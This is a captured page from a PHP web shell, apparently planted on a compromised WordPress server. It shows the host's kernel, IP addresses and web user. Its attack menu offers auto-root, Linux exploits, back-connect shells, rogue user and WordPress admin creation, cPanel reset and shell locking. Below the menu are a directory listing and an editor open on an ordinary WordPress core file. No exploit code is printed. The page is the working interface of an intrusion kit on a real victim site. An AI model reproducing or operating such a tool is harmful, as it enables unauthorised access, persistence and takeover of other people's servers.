Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
infonepal /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
archives
[ DIR ]
drwxrwxr-x
audio
[ DIR ]
drwxrwxr-x
block
[ DIR ]
drwxrwxr-x
button
[ DIR ]
drwxrwxr-x
buttons
[ DIR ]
drwxrwxr-x
calendar
[ DIR ]
drwxrwxr-x
categories
[ DIR ]
drwxrwxr-x
code
[ DIR ]
drwxrwxr-x
column
[ DIR ]
drwxrwxr-x
columns
[ DIR ]
drwxrwxr-x
embed
[ DIR ]
drwxrwxr-x
file
[ DIR ]
drwxrwxr-x
freeform
[ DIR ]
drwxrwxr-x
gallery
[ DIR ]
drwxrwxr-x
group
[ DIR ]
drwxrwxr-x
heading
[ DIR ]
drwxrwxr-x
html
[ DIR ]
drwxrwxr-x
image
[ DIR ]
drwxrwxr-x
latest-comments
[ DIR ]
drwxrwxr-x
latest-posts
[ DIR ]
drwxrwxr-x
list
[ DIR ]
drwxrwxr-x
media-text
[ DIR ]
drwxrwxr-x
missing
[ DIR ]
drwxrwxr-x
more
[ DIR ]
drwxrwxr-x
nextpage
[ DIR ]
drwxrwxr-x
paragraph
[ DIR ]
drwxrwxr-x
preformatted
[ DIR ]
drwxrwxr-x
pullquote
[ DIR ]
drwxrwxr-x
quote
[ DIR ]
drwxrwxr-x
rss
[ DIR ]
drwxrwxr-x
search
[ DIR ]
drwxrwxr-x
separator
[ DIR ]
drwxrwxr-x
shortcode
[ DIR ]
drwxrwxr-x
social-link
[ DIR ]
drwxrwxr-x
social-links
[ DIR ]
drwxrwxr-x
spacer
[ DIR ]
drwxrwxr-x
subhead
[ DIR ]
drwxrwxr-x
table
[ DIR ]
drwxrwxr-x
tag-cloud
[ DIR ]
drwxrwxr-x
text-columns
[ DIR ]
drwxrwxr-x
verse
[ DIR ]
drwxrwxr-x
video
[ DIR ]
drwxrwxr-x
archives.php
2.7
KB
-rwxrwxr-x
block.php
1.78
KB
-rwxrwxr-x
calendar.php
1.53
KB
-rwxrwxr-x
categories.php
2.51
KB
-rwxrwxr-x
index.php
1.5
KB
-rwxrwxr-x
latest-comments.php
4.88
KB
-rwxrwxr-x
latest-posts.php
6.91
KB
-rwxrwxr-x
rss.php
3.17
KB
-rwxrwxr-x
search.php
4.81
KB
-rwxrwxr-x
shortcode.php
697
B
-rwxrwxr-x
social-link.php
57.81
KB
-rwxrwxr-x
tag-cloud.php
1.24
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : categories.php
<?php /** * Server-side rendering of the `core/categories` block. * * @package WordPress */ /** * Renders the `core/categories` block on server. * * @param array $attributes The block attributes. * * @return string Returns the categories list/dropdown markup. */ function render_block_core_categories( $attributes ) { static $block_id = 0; $block_id++; $args = array( 'echo' => false, 'hierarchical' => ! empty( $attributes['showHierarchy'] ), 'orderby' => 'name', 'show_count' => ! empty( $attributes['showPostCounts'] ), 'title_li' => '', ); if ( ! empty( $attributes['displayAsDropdown'] ) ) { $id = 'wp-block-categories-' . $block_id; $args['id'] = $id; $args['show_option_none'] = __( 'Select Category' ); $wrapper_markup = '<div %1$s>%2$s</div>'; $items_markup = wp_dropdown_categories( $args ); $type = 'dropdown'; if ( ! is_admin() ) { // Inject the dropdown script immediately after the select dropdown. $items_markup = preg_replace( '#(?<=</select>)#', build_dropdown_script_block_core_categories( $id ), $items_markup, 1 ); } } else { $wrapper_markup = '<ul %1$s>%2$s</ul>'; $items_markup = wp_list_categories( $args ); $type = 'list'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => "wp-block-categories-{$type}" ) ); return sprintf( $wrapper_markup, $wrapper_attributes, $items_markup ); } /** * Generates the inline script for a categories dropdown field. * * @param string $dropdown_id ID of the dropdown field. * * @return string Returns the dropdown onChange redirection script. */ function build_dropdown_script_block_core_categories( $dropdown_id ) { ob_start(); ?> <script type='text/javascript'> /* <![CDATA[ */ ( function() { var dropdown = document.getElementById( '<?php echo esc_js( $dropdown_id ); ?>' ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { location.href = "<?php echo home_url(); ?>/?cat=" + dropdown.options[ dropdown.selectedIndex ].value; } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> <?php return ob_get_clean(); } /** * Registers the `core/categories` block on server. */ function register_block_core_categories() { register_block_type_from_metadata( __DIR__ . '/categories', array( 'render_callback' => 'render_block_core_categories', ) ); } add_action( 'init', 'register_block_core_categories' );
Close